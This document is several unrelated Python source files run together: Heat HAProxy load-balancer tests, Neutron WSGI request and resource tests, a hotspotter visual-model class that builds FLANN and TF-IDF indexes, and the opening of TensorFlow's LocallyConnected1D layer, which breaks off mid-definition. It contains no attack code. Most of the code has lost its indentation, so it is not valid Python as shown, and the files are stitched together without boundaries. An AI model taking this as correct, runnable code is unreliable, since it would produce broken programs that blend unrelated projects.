lb_defn = stack.t.resource_definitions(stack)[resource_name]
rsrc = lb.LoadBalancer(resource_name, lb_defn, stack)
params = rsrc.child_params()
# A None value means the parameter's default ([]) will be used.
expected = {'SecurityGroups': None}
self.assertEqual(expected, params)
class HaProxyConfigTest(common.HeatTestCase):
def setUp(self):
super(HaProxyConfigTest, self).setUp()
self.stack = utils.parse_stack(template_format.parse(lb_template))
resource_name = 'LoadBalancer'
lb_defn = self.stack.t.resource_definitions(self.stack)[resource_name]
self.lb = lb.LoadBalancer(resource_name, lb_defn, self.stack)
self.lb.client_plugin = mock.Mock()
def _mock_props(self, props):
def get_props(name):
return props[name]
self.lb.properties = mock.MagicMock()
self.lb.properties.__getitem__.side_effect = get_props
def test_combined(self):
self.lb._haproxy_config_global = mock.Mock(return_value='one,')
self.lb._haproxy_config_frontend = mock.Mock(return_value='two,')
self.lb._haproxy_config_backend = mock.Mock(return_value='three,')
self.lb._haproxy_config_servers = mock.Mock(return_value='four')
actual = self.lb._haproxy_config([3, 5])
self.assertEqual('one,two,three,four\n', actual)
self.lb._haproxy_config_global.assert_called_once_with()
self.lb._haproxy_config_frontend.assert_called_once_with()
self.lb._haproxy_config_backend.assert_called_once_with()
self.lb._haproxy_config_servers.assert_called_once_with([3, 5])
def test_global(self):
exp = '''
global
daemon
maxconn 256
stats socket /tmp/.haproxy-stats
defaults
mode http
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
'''
actual = self.lb._haproxy_config_global()
self.assertEqual(exp, actual)
def test_frontend(self):
props = {'HealthCheck': {},
'Listeners': [{'LoadBalancerPort': 4014}]}
self._mock_props(props)
exp = '''
frontend http
bind *:4014
default_backend servers
'''
actual = self.lb._haproxy_config_frontend()
self.assertEqual(exp, actual)
def test_backend_with_timeout(self):
props = {'HealthCheck': {'Timeout': 43}}
self._mock_props(props)
actual = self.lb._haproxy_config_backend()
exp = '''
backend servers
balance roundrobin
option http-server-close
option forwardfor
option httpchk
timeout check 43s
'''
self.assertEqual(exp, actual)
def test_backend_no_timeout(self):
self._mock_props({'HealthCheck': None})
be = self.lb._haproxy_config_backend()
exp = '''
backend servers
balance roundrobin
option http-server-close
option forwardfor
option httpchk
'''
self.assertEqual(exp, be)
def test_servers_none(self):
props = {'HealthCheck': {},
'Listeners': [{'InstancePort': 1234}]}
self._mock_props(props)
actual = self.lb._haproxy_config_servers([])
exp = ''
self.assertEqual(exp, actual)
def test_servers_no_check(self):
props = {'HealthCheck': {},
'Listeners': [{'InstancePort': 4511}]}
self._mock_props(props)
def fake_to_ipaddr(inst):
return '192.168.1.%s' % inst
to_ip = self.lb.client_plugin.return_value.server_to_ipaddress
to_ip.side_effect = fake_to_ipaddr
actual = self.lb._haproxy_config_servers(range(1, 3))
exp = '''
server server1 192.168.1.1:4511
server server2 192.168.1.2:4511'''
self.assertEqual(exp.replace('\n', '', 1), actual)
def test_servers_servers_and_check(self):
props = {'HealthCheck': {'HealthyThreshold': 1,
'Interval': 2,
'Target': 'HTTP:80/',
'Timeout': 45,
'UnhealthyThreshold': 5
},
'Listeners': [{'InstancePort': 1234}]}
self._mock_props(props)
def fake_to_ipaddr(inst):
return '192.168.1.%s' % inst
to_ip = self.lb.client_plugin.return_value.server_to_ipaddress
to_ip.side_effect = fake_to_ipaddr
actual = self.lb._haproxy_config_servers(range(1, 3))
exp = '''
server server1 192.168.1.1:1234 check inter 2s fall 5 rise 1
server server2 192.168.1.2:1234 check inter 2s fall 5 rise 1'''
self.assertEqual(exp.replace('\n', '', 1), actual)
# Copyright (c) 2012 Intel Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import oslo_i18n
from webob import exc
import webtest
from neutron._i18n import _
from neutron.api.v2 import resource as wsgi_resource
from neutron.common import exceptions as n_exc
from neutron import context
from neutron.tests import base
from neutron import wsgi
class RequestTestCase(base.BaseTestCase):
def setUp(self):
super(RequestTestCase, self).setUp()
self.req = wsgi_resource.Request({'foo': 'bar'})
def test_content_type_missing(self):
request = wsgi.Request.blank('/tests/123', method='POST')
request.body = b"<body />"
self.assertIsNone(request.get_content_type())
def test_content_type_with_charset(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Content-Type"] = "application/json; charset=UTF-8"
result = request.get_content_type()
self.assertEqual("application/json", result)
def test_content_type_from_accept(self):
content_type = 'application/json'
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = content_type
result = request.best_match_content_type()
self.assertEqual(content_type, result)
def test_content_type_from_accept_best(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = "application/json"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = ("application/json; q=0.3, "
"application/xml; q=0.9")
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_from_query_extension(self):
request = wsgi.Request.blank('/tests/123.json')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123.invalid')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_accept_and_query_extension(self):
request = wsgi.Request.blank('/tests/123.json')
request.headers["Accept"] = "application/xml"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_accept_default(self):
request = wsgi.Request.blank('/tests/123.unsupported')
request.headers["Accept"] = "application/unsupported1"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_context_with_neutron_context(self):
ctxt = context.Context('fake_user', 'fake_tenant')
self.req.environ['neutron.context'] = ctxt
self.assertEqual(self.req.context, ctxt)
def test_context_without_neutron_context(self):
self.assertTrue(self.req.context.is_admin)
def test_request_context_elevated(self):
user_context = context.Context(
'fake_user', 'fake_project', admin=False)
self.assertFalse(user_context.is_admin)
admin_context = user_context.elevated()
self.assertFalse(user_context.is_admin)
self.assertTrue(admin_context.is_admin)
self.assertNotIn('admin', user_context.roles)
self.assertIn('admin', admin_context.roles)
def test_best_match_language(self):
# Test that we are actually invoking language negotiation via webob
request = wsgi.Request.blank('/')
oslo_i18n.get_available_languages = mock.MagicMock()
oslo_i18n.get_available_languages.return_value = ['known-language',
'es', 'zh']
request.headers['Accept-Language'] = 'known-language'
language = request.best_match_language()
self.assertEqual('known-language', language)
# If the Accept-Language header is an unknown language, missing or empty,
# the best match locale should be None
request.headers['Accept-Language'] = 'unknown-language'
language = request.best_match_language()
self.assertIsNone(language)
request.headers['Accept-Language'] = ''
language = request.best_match_language()
self.assertIsNone(language)
request.headers.pop('Accept-Language')
language = request.best_match_language()
self.assertIsNone(language)
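# A minimal, hedged sketch of the content-type negotiation exercised above:
def _demo_content_negotiation():
    request = wsgi.Request.blank('/tests/123.json')
    request.headers['Accept'] = 'application/xml'
    return request.best_match_content_type()  # query extension wins: json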
class ResourceTestCase(base.BaseTestCase):
@staticmethod
def _get_deserializer():
return wsgi.JSONDeserializer()
def test_unmapped_neutron_error_with_json(self):
msg = u'\u7f51\u7edc'
class TestException(n_exc.NeutronException):
message = msg
expected_res = {'body': {
'NeutronError': {
'type': 'TestException',
'message': msg,
'detail': ''}}}
controller = mock.MagicMock()
controller.test.side_effect = TestException()
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPInternalServerError.code, res.status_int)
self.assertEqual(expected_res,
wsgi.JSONDeserializer().deserialize(res.body))
@mock.patch('oslo_i18n.translate')
def test_unmapped_neutron_error_localized(self, mock_translation):
msg_translation = 'Translated error'
mock_translation.return_value = msg_translation
msg = _('Unmapped error')
class TestException(n_exc.NeutronException):
message = msg
controller = mock.MagicMock()
controller.test.side_effect = TestException()
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPInternalServerError.code, res.status_int)
self.assertIn(msg_translation,
str(wsgi.JSONDeserializer().deserialize(res.body)))
def test_mapped_neutron_error_with_json(self):
msg = u'\u7f51\u7edc'
class TestException(n_exc.NeutronException):
message = msg
expected_res = {'body': {
'NeutronError': {
'type': 'TestException',
'message': msg,
'detail': ''}}}
controller = mock.MagicMock()
controller.test.side_effect = TestException()
faults = {TestException: exc.HTTPGatewayTimeout}
resource = webtest.TestApp(wsgi_resource.Resource(controller,
faults=faults))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPGatewayTimeout.code, res.status_int)
self.assertEqual(expected_res,
wsgi.JSONDeserializer().deserialize(res.body))
@mock.patch('oslo_i18n.translate')
def test_mapped_neutron_error_localized(self, mock_translation):
msg_translation = 'Translated error'
mock_translation.return_value = msg_translation
msg = _('Unmapped error')
class TestException(n_exc.NeutronException):
message = msg
controller = mock.MagicMock()
controller.test.side_effect = TestException()
faults = {TestException: exc.HTTPGatewayTimeout}
resource = webtest.TestApp(wsgi_resource.Resource(controller,
faults=faults))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPGatewayTimeout.code, res.status_int)
self.assertIn(msg_translation,
str(wsgi.JSONDeserializer().deserialize(res.body)))
@staticmethod
def _make_request_with_side_effect(side_effect):
controller = mock.MagicMock()
controller.test.side_effect = side_effect
resource = webtest.TestApp(wsgi_resource.Resource(controller))
routing_args = {'action': 'test'}
environ = {'wsgiorg.routing_args': (None, routing_args)}
res = resource.get('', extra_environ=environ, expect_errors=True)
return res
def test_http_error(self):
res = self._make_request_with_side_effect(exc.HTTPGatewayTimeout())
# verify that the exception structure is the one expected
# by the python-neutronclient
self.assertEqual(exc.HTTPGatewayTimeout().explanation,
res.json['NeutronError']['message'])
self.assertEqual('HTTPGatewayTimeout',
res.json['NeutronError']['type'])
self.assertEqual('', res.json['NeutronError']['detail'])
self.assertEqual(exc.HTTPGatewayTimeout.code, res.status_int)
def test_unhandled_error(self):
expected_res = {'body': {'NeutronError':
{'detail': '',
'message': _(
'Request Failed: internal server '
'error while processing your request.'),
'type': 'HTTPInternalServerError'}}}
res = self._make_request_with_side_effect(side_effect=Exception())
self.assertEqual(exc.HTTPInternalServerError.code,
res.status_int)
self.assertEqual(expected_res,
self._get_deserializer().deserialize(res.body))
def test_not_implemented_error(self):
expected_res = {'body': {'NeutronError':
{'detail': '',
'message': _(
'The server has either erred or is '
'incapable of performing the requested '
'operation.'),
'type': 'HTTPNotImplemented'}}}
res = self._make_request_with_side_effect(exc.HTTPNotImplemented())
self.assertEqual(exc.HTTPNotImplemented.code, res.status_int)
self.assertEqual(expected_res,
self._get_deserializer().deserialize(res.body))
def test_status_200(self):
controller = mock.MagicMock()
controller.test = lambda request: {'foo': 'bar'}
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test'})}
res = resource.get('', extra_environ=environ)
self.assertEqual(200, res.status_int)
def test_status_204(self):
controller = mock.MagicMock()
controller.test = lambda request: {'foo': 'bar'}
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'delete'})}
res = resource.delete('', extra_environ=environ)
self.assertEqual(204, res.status_int)
def test_action_status(self):
controller = mock.MagicMock()
controller.test = lambda request: {'foo': 'bar'}
action_status = {'test_200': 200, 'test_201': 201, 'test_204': 204}
resource = webtest.TestApp(
wsgi_resource.Resource(controller,
action_status=action_status))
for action in action_status:
environ = {'wsgiorg.routing_args': (None, {'action': action})}
res = resource.get('', extra_environ=environ)
self.assertEqual(action_status[action], res.status_int)
def _test_error_log_level(self, expected_webob_exc, expect_log_info=False,
use_fault_map=True, exc_raised=None):
if not exc_raised:
class TestException(n_exc.NeutronException):
message = 'Test Exception'
exc_raised = TestException
controller = mock.MagicMock()
controller.test.side_effect = exc_raised()
faults = {exc_raised: expected_webob_exc} if use_fault_map else {}
resource = webtest.TestApp(wsgi_resource.Resource(controller, faults))
environ = {'wsgiorg.routing_args': (None, {'action': 'test'})}
with mock.patch.object(wsgi_resource, 'LOG') as log:
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(expected_webob_exc.code, res.status_int)
self.assertEqual(expect_log_info, log.info.called)
self.assertNotEqual(expect_log_info, log.exception.called)
def test_4xx_error_logged_info_level(self):
self._test_error_log_level(exc.HTTPNotFound, expect_log_info=True)
def test_non_4xx_error_logged_exception_level(self):
self._test_error_log_level(exc.HTTPServiceUnavailable,
expect_log_info=False)
def test_unmapped_error_logged_exception_level(self):
self._test_error_log_level(exc.HTTPInternalServerError,
expect_log_info=False, use_fault_map=False)
def test_webob_4xx_logged_info_level(self):
self._test_error_log_level(exc.HTTPNotFound,
use_fault_map=False, expect_log_info=True,
exc_raised=exc.HTTPNotFound)
def test_webob_5xx_logged_info_level(self):
self._test_error_log_level(exc.HTTPServiceUnavailable,
use_fault_map=False, expect_log_info=False,
exc_raised=exc.HTTPServiceUnavailable)
def test_no_route_args(self):
controller = mock.MagicMock()
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPInternalServerError.code, res.status_int)
def test_post_with_body(self):
controller = mock.MagicMock()
controller.test = lambda request, body: {'foo': 'bar'}
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test'})}
res = resource.post('', params='{"key": "val"}',
extra_environ=environ)
self.assertEqual(200, res.status_int)
import shelve
from hotspotter.other.AbstractPrintable import AbstractManager
from hotspotter.other.ConcretePrintable import DynStruct, Pref
from hotspotter.other.logger import logmsg, logdbg, logio, logerr, logwarn
from hotspotter.tpl.pyflann import FLANN
from itertools import chain
import numpy as np
import pylab
import os
from numpy import spacing as eps
# TODO: TF-IDF still needs the hierarchical or approximate kmeans to work.
class VisualModel(AbstractManager):
def init_preferences(vm, default_bit=False):
        if vm.model_prefs is None:
pref_fpath = vm.hs.iom.get_prefs_fpath('visual_model_prefs')
vm.model_prefs = Pref(fpath=pref_fpath)
vm.model_prefs.save_load_model = Pref(True)
def __init__(vm, hs=None):
        super(VisualModel, vm).__init__(hs)
vm.model_prefs = None
# ---
vm.train_cid = np.array([],dtype=np.uint32)
vm.flann = None # This should delete itself
vm.isDirty = True
# --- Inverted Index ---
        # The support for the model (aka visual word cluster centers)
# In the case of Naive Bayes, this is the raw features
# In the case of Quantization, these are the cluster centers
vm.wx2_fdsc = np.array([], dtype=np.uint8)
vm.wx2_axs = [] # List of axs belonging to this word
# --- TFIDF-Model ---
vm.wx2_idf = np.array([], dtype=np.float32) # Word -> Inverse Document Frequency
vm.wx2_maxtf = np.array([], dtype=np.float32) # Word -> Maximum Database Term Frequency
# --- Model Source Metadata --
vm.ax2_cid = np.array([], dtype=np.uint32) # indexed chips
vm.ax2_fx = np.array([], dtype=np.uint32) # indexed features
# --- The Sample Data ---
vm.sample_filter = {'exclude_cids' : [],
'one_out_each_name' : False,
'less_than_offset_ok' : False,
'offset' : 1,
'randomize' : 0,
'max_numc_per_name' :-1,
'min_numc_per_name' :-1,
}
# --- Bookkeeping --
vm.savable_model_fields = [ 'wx2_fdsc', 'wx2_axs', 'wx2_idf',
'wx2_maxtf', 'ax2_cid', 'ax2_fx',
'train_cid']
vm.init_preferences()
def reset(vm):
        logmsg('Resetting the Visual Model')
vm.isDirty = True
vm.wx2_fdsc = np.array([], dtype=np.uint8)
vm.wx2_axs = []
vm.wx2_idf = np.array([], dtype=np.float32)
vm.wx2_maxtf = np.array([], dtype=np.float32)
vm.ax2_cid = np.array([], dtype=np.uint32)
vm.ax2_fx = np.array([], dtype=np.uint32)
def ax2_cx(vm, axs):
'aggregate index to chip index'
return vm.hs.cm.cid2_cx[vm.ax2_cid[axs]]
def delete_model(vm):
logdbg('Deleting Sample Index')
        if vm.flann is not None:
            try:
                vm.flann.delete_index()
                vm.flann = None
            except Exception:  # WindowsError is only defined on Windows
                logwarn('WARNING: FLANN is not deleting correctly')
vm.reset()
    # SHOULD BECOME DEPRECATED
def nearest_neighbors(vm, qfdsc, K):
        ''' qfx2_wxs   - (num_feats x K) Query Descriptor Index to the K Nearest Word Indexes
            qfx2_dists - (num_feats x K) Query Descriptor Index to the Distance to the K Nearest Word Vectors '''
        #assert vm.flann is not None, 'Cannot query an empty index'
        #assert len(qfdsc) != 0, 'Cannot have an empty query'
        #logdbg('Searching for Nearest Neighbors: #vectors=%d, K=%d' % (len(qfdsc), K))
(qfx2_Kwxs, qfx2_Kdists) = vm.flann.nn_index(qfdsc, K, checks=128)
qfx2_Kwxs.shape = (qfdsc.shape[0], K)
qfx2_Kdists.shape = (qfdsc.shape[0], K)
return (qfx2_Kwxs, qfx2_Kdists)
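    # A minimal usage sketch of nearest_neighbors (hypothetical sizes, for
    # illustration only):
    #   qfdsc = np.zeros((num_query_feats, 128), dtype=np.uint8)
    #   qfx2_wxs, qfx2_dists = vm.nearest_neighbors(qfdsc, K=5)
    #   # qfx2_wxs.shape == qfx2_dists.shape == (num_query_feats, 5)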
    # Probably will have to make this work over cids eventually. Maybe.
def build_model(vm, force_recomp=False):
''' Builds the model, if needed. Tries to reload if it can '''
logmsg('\n\nRequested: Build Model')
if not force_recomp and not vm.isDirty:
logmsg('The model is clean and is not forced to recompute')
return True
cm = vm.hs.cm
# Delete old index and resample chips to index
vm.delete_model()
vm.sample_train_set()
# Try to load the correct model
if not force_recomp and vm.load_model():
logmsg('Loaded saved model from disk')
            return True
logmsg('Building the model. This may take some time.')
# Could not load old model. Do full rebuild
# -----
# STEP 1 - Loading
logdbg('Step 1: Aggregate the model support (Load feature vectors) ---')
tx2_cx = vm.get_train_cx()
tx2_cid = vm.get_train_cid()
        assert len(tx2_cx) > 0, 'Training set cannot be empty'
logdbg('Building model with %d sample chips' % (vm.num_train()))
cm.load_features(tx2_cx)
tx2_nfpts = cm.cx2_nfpts(tx2_cx)
num_train_keypoints = sum(tx2_nfpts)
# -----
# STEP 2 - Aggregating
logdbg('Step 2: Build the model Words')
isTFIDF = False
if vm.hs.am.algo_prefs.model.quantizer == 'naive_bayes':
            logdbg('No Quantization. Aggregating all descriptors for nearest neighbor search.')
vm.wx2_fdsc = np.empty((num_train_keypoints,128),dtype=np.uint8)
_p = 0
for cx in tx2_cx:
nfdsc = cm.cx2_nfpts(cx)
vm.wx2_fdsc[_p:_p+nfdsc,:] = cm.cx2_fdsc[cx]
_p += nfdsc
            ax2_wx = np.arange(num_train_keypoints, dtype=np.uint32)
if vm.hs.am.algo_prefs.model.quantizer == 'akmeans':
raise NotImplementedError(':)')
# -----
# STEP 3 - Inverted Indexing
logdbg('Step 3: Point the parts of the model back to their source')
vm.wx2_axs = np.empty(vm.wx2_fdsc.shape[0], dtype=object)
        for ax in xrange(0, num_train_keypoints):
            wx = ax2_wx[ax]
            if vm.wx2_axs[wx] is None:
                vm.wx2_axs[wx] = []
            vm.wx2_axs[wx].append(ax)
vm.ax2_cid = -np.ones(num_train_keypoints,dtype=np.int32)
vm.ax2_fx = -np.ones(num_train_keypoints,dtype=np.int32)
ax2_tx = -np.ones(num_train_keypoints,dtype=np.int32)
curr_fx = 0; next_fx = 0
for tx in xrange(vm.num_train()):
nfpts = tx2_nfpts[tx]
next_fx = next_fx + nfpts
ax_range = range(curr_fx,next_fx)
ax2_tx[ax_range] = tx
vm.ax2_cid[ax_range] = tx2_cid[tx] # Point to Inst
vm.ax2_fx[ax_range] = range(nfpts) # Point to Kpts
curr_fx = curr_fx + nfpts
        if isTFIDF:  # Compute info for TF-IDF
            logdbg('Computing TF-IDF metadata')
            max_tx = len(tx2_cx)
            tx2_wtf_denom = np.float32(cm.cx2_nfpts(tx2_cx))
            vm.wx2_maxtf = np.array(
                [(np.float32(np.bincount(ax2_tx[ax_of_wx], minlength=max_tx)) / tx2_wtf_denom).max()
                 for ax_of_wx in vm.wx2_axs], dtype=np.float32)
            vm.wx2_idf = np.log2(np.array(
                [vm.num_train() / np.float32(len(pylab.unique(ax2_tx[ax_of_wx])))
                 for ax_of_wx in vm.wx2_axs], dtype=np.float32) + eps(1))
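            # Sketch of the quantities above (assuming the standard TF-IDF
            # definitions): wx2_idf[wx] = log2(num_train / df(wx) + eps), where
            # df(wx) is the number of training chips containing word wx, and
            # wx2_maxtf[wx] is the largest per-chip term frequency of wx.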
logdbg('Built Model using %d feature vectors. Preparing to index.' % len(vm.ax2_cid))
# -----
# STEP 4 - Indexing
logdbg('Step 4: Building FLANN Index: over '+str(len(vm.wx2_fdsc))+' words')
assert vm.flann is None, 'Flann already exists'
vm.flann = FLANN()
flann_param_dict = vm.hs.am.algo_prefs.model.indexer.to_dict()
flann_params = vm.flann.build_index(vm.wx2_fdsc, **flann_param_dict)
vm.isDirty = False
vm.save_model()
logmsg('The model was built.')
def save_model(vm):
# See if the model is savable
if not vm.model_prefs.save_load_model:
logdbg('Can NOT save the visual model due to preferences')
return False
if vm.isDirty:
raise Exception('Can NOT save the visual model due to dirty index')
if vm.flann is None:
raise Exception('Can NOT save the visual model without a flann index')
logdbg('Building dictionary to save')
# TODO: This dictionary should just exist and not be
# directly tied to this class.
# Build a dictionary of savable model terms
to_save_dict = {key : vm.__dict__[key] \
for key in vm.savable_model_fields }
# Get the save paths
model_fpath = vm.hs.iom.get_model_fpath()
flann_index_fpath = vm.hs.iom.get_flann_index_fpath()
# Save the Model
logio('Saving model to: '+model_fpath)
np.savez(model_fpath, **to_save_dict)
# Save the Index
logio('Saving index to: '+flann_index_fpath)
vm.flann.save_index(flann_index_fpath)
        logio('Model save was successful')
return True
def load_model(vm):
# See if the model is loadable
if not vm.model_prefs.save_load_model:
logdbg('Can NOT load the visual model')
return False
        if vm.flann is not None:
raise Exception('Cannot load a model when FLANN already exists')
logdbg('Trying to load visual model')
# Check to see if new model on disk
model_fpath = vm.hs.iom.get_model_fpath()
        if not os.path.exists(model_fpath):
            logdbg(' * A saved model data file was missing: ' + model_fpath)
            return False
flann_index_fpath = vm.hs.iom.get_flann_index_fpath()
        if not os.path.exists(flann_index_fpath):
            logdbg(' * A saved flann index file was missing: ' + flann_index_fpath)
            return False
# Model and Flann Exist on disk
# Load the model data first
# Read model into dictionary
logmsg('Loading visual model data: ' + model_fpath)
npz = np.load(model_fpath)
for _key in npz.files:
vm.__dict__[_key] = npz[_key]
npz.close()
# Read FLANN index
logmsg('Loading FLANN index: '+ flann_index_fpath)
vm.flann = FLANN()
vm.flann.load_index(flann_index_fpath, vm.wx2_fdsc)
vm.isDirty = False
        logmsg('The model was successfully loaded')
return True
    # SHOULD BECOME DEPRECATED
def sample_train_set(vm, samp_filter_arg=None):
''' This is some pretty legacy matlab stuff. It builds a sample set for
the model based on some specifications'''
cm = vm.hs.cm; nm = vm.hs.nm
if samp_filter_arg is None:
filt = vm.sample_filter
else:
filt = samp_filter_arg
logdbg('Collecting sample set: \n SAMP_FILTER:\n - '+str(filt).replace(', ',' \n - ')[1:-1])
old_train = vm.train_cid
train_cx = cm.all_cxs()
        # Filter things out from train_cx
if filt['min_numc_per_name'] > -1:
_min = filt['min_numc_per_name']
vnxs = nm.get_valid_nxs(min_chips=_min)
cxsPool = [nm.nx2_cx_list[_cx] for _cx in vnxs]
train_cx = list(chain.from_iterable(cxsPool))
if filt['one_out_each_name'] is True:
vnxs = nm.get_valid_nxs()
offset = filt['offset']
cxsPool = [nm.nx2_cx_list[_cx] for _cx in vnxs]
pickFun = lambda cxs: offset % len(cxs)
_test_cx = np.array(map(lambda cxs: cxs[pickFun(cxs)], cxsPool))
            if filt['less_than_offset_ok'] is False:
                nOther = cm.cx2_num_other_chips(_test_cx)
                _okBit = nOther > offset
                _test_cx = _test_cx[_okBit]
            train_cx = np.setdiff1d(train_cx, _test_cx)
if len(filt['exclude_cids']) > 0:
            exclu_cx = cm.cid2_cx[filt['exclude_cids']]
train_cx = np.setdiff1d(train_cx, exclu_cx)
vm.train_cid = cm.cx2_cid[train_cx]
logdbg('Train: '+str(vm.get_train_cid()))
logdbg('Test: '+str(vm.get_test_cid()))
if not vm.isDirty:
if not (len(old_train) == len(vm.train_cid)\
and all(old_train == vm.train_cid)):
vm.isDirty = True
logdbg('The sample has changed.')
else:
logdbg('The sample has not changed.')
logdbg('The index is '+['Clean','Dirty'][vm.isDirty])
def num_train(vm):
return len(vm.train_cid)
def get_train_cx(vm):
return vm.hs.cm.cid2_cx[vm.get_train_cid()]
def get_test_cx(vm):
return np.setdiff1d(vm.hs.cm.all_cxs(), vm.get_train_cx())
def get_test_cid(vm):
return vm.hs.cm.cx2_cid[vm.get_test_cx()]
def get_train_cid(vm):
return vm.train_cid
def flip_sample(vm):
vm.train_cid = vm.get_test_cid()
def get_samp_id(vm):
'''
Returns an id unique to the sampled train_cid
        Note: if a cid is assigned to another chip, this will break
'''
iom = vm.hs.iom
samp_shelf = shelve.open(iom.get_temp_fpath('sample_shelf.db'))
samp_key = '%r' % vm.train_cid
        if samp_key not in samp_shelf:
            samp_shelf[samp_key] = len(samp_shelf) + 1
samp_id = samp_shelf[samp_key]
samp_shelf.close()
return samp_id
def get_samp_suffix(vm):
return '.samp'+str(vm.get_samp_id())
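# A minimal end-to-end sketch (hypothetical handles, illustration only):
#   vm = VisualModel(hs)
#   vm.sample_train_set()    # pick the training sample (marks the model dirty on change)
#   vm.build_model()         # reloads a saved model if possible, else rebuilds and saves
#   suffix = vm.get_samp_suffix()   # e.g. '.samp3', unique to the sampled train_cid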
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Locally-connected layers.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras import activations
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import constraints
from tensorflow.python.keras import initializers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.engine.base_layer import Layer
from tensorflow.python.keras.engine.input_spec import InputSpec
from tensorflow.python.keras.utils import conv_utils
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util.tf_export import tf_export
@tf_export('keras.layers.LocallyConnected1D')
class LocallyConnected1D(Layer):
"""Locally-connected layer for 1D inputs.
The `LocallyConnected1D` layer works similarly to
the `Conv1D` layer, except that weights are unshared,
that is, a different set of filters is applied at each different patch
of the input.
Example:
```python
  # apply an unshared weight 1D convolution of length 3 to a sequence with
# 10 timesteps, with 64 output filters
model = Sequential()
model.add(LocallyConnected1D(64, 3, input_shape=(10, 32)))
# now model.output_shape == (None, 8, 64)
# add a new conv1d on top
model.add(LocallyConnected1D(32, 3))
# now model.output_shape == (None, 6, 32)
```
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: Currently only supports `"valid"` (case-insensitive).
`"same"` may be supported in the future.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, length, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, length)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
      the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
implementation: implementation mode, either `1` or `2`.
`1` loops over input spatial locations to perform the forward pass.
It is memory-efficient but performs a lot of (small) ops.
`2` stores layer weights in a dense but sparsely-populated 2D matrix
and implements the forward pass as a single matrix-multiply. It uses
a lot of RAM but performs few (large) ops.
Depending on the inputs, layer parameters, hardware, and
`tf.executing_eagerly()` one implementation can be dramatically faster
(e.g. 50X) than another.
It is recommended to benchmark both in the setting of interest to pick
the most efficient one (in terms of speed and memory usage).
Following scenarios could benefit from setting `implementation=2`:
- eager execution;
- inference;
- running on CPU;
- large amount of RAM available;
- small models (few filters, small kernel);
- using `padding=same` (only possible with `implementation=2`).
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
filters,
kernel_size,
strides=1,
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
